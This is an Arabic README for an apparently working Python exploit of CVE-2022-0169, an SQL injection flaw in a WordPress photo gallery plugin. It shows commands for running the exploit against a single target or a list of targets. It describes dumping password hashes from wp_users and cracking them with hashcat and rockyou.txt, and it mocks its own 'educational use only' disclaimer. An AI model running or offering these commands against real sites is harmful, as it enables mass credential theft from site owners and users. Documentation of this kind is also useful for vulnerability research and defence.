
CVE-2022-0169 - WordPress Photo Gallery إثبات مفهوم حقن SQL
هذا نص برهاني بسيط بلغة بايثون (PoC) للثغرة CVE-2022-0169، وهي ثغرة حقن SQL في إضافة معرض الصور لووردبريس.
admin-ajax.phpwp_usersهذه الأداة للاستخدام التعليمي فقط. استخدمها بمسؤولية! وكأنك ستستمع لهذا.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
مثال:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
المتطلبات
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/عند العثور على تجزئات، سيُطرح عليك السؤال التالي:
هل تريد كسر التجزئات باستخدام hashcat الآن؟ [Y/N]:
إذا ضغطت Y، فسيتم تشغيل hashcat تلقائيًا باستخدام قائمة الكلمات المحددة.
results/ لرؤية المخرجات والتجزئات.hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
هذه الأداة للاستخدام التعليمي والاختبار المصرح به فقط. أنت وحدك المسؤول عن كيفية استخدامها. احصل دائمًا على الإذن قبل مسح أي نظام أو استغلاله.
ابقَ سايبربانك.
— X3RX3S
| الخيار | الوصف |
|---|
-u | رابط الهدف الفردي |
-f | ملف يحتوي على قائمة بالأهداف |
-p | بروكسي (مثل http://127.0.0.1:8080) |
-t | عدد الخيوط (الافتراضي: 5) |
-w | اختيار قائمة كلمات لـ hashcat (الافتراضي: rockyou.txt) تأكد من أن rockyou.txt غير مضغوطة! |